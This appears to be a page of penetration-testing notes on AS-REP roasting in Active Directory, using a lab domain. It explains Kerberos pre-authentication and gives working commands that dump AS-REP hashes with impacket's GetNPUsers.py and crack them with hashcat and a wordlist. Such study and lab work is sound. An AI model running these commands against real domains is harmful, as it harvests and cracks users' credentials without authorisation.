ASREP-Roast

Attack to find accounts with the privilege "Does not require Pre-Authentication" (this enables the user to request tickets without a previous authentication in the KDC) and extract its TGTs for cracking.

"Without Kerberos Pre-Auth" (the request from Client to request a TGT to the KDC), "when a client sends an Authentication Service request, the client’s User Principle Name (UPN) is included in the request with not much additional verification data. The KDC checks if the UPN exists in its database. If so, the KDC sends back an Authentication Service reply including a Ticket Granting ticket." https://www.linkedin.com/pulse/kerberos-pre-auth-one-checkbox-can-mean-lot-darryl

Using the GetNPUsers.py tool of impacket and passing an existent list of users we can check those accounts.

➧ cat users_valid.txt 
james@spookysec.local
[...]

python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users_valid.txt -dc-ip 10.10.253.172 -format hashcat -outputfile users_asreproastables.txt 'spookysec.local/'

hashcat -a 0 -m 18200 users_asreproastables.txt /usr/share/wordlists/rockyou.txt -o users_asreproastables.txt.cracked

PreviousUser enumeration NextKerberoasting

Last updated 27 days ago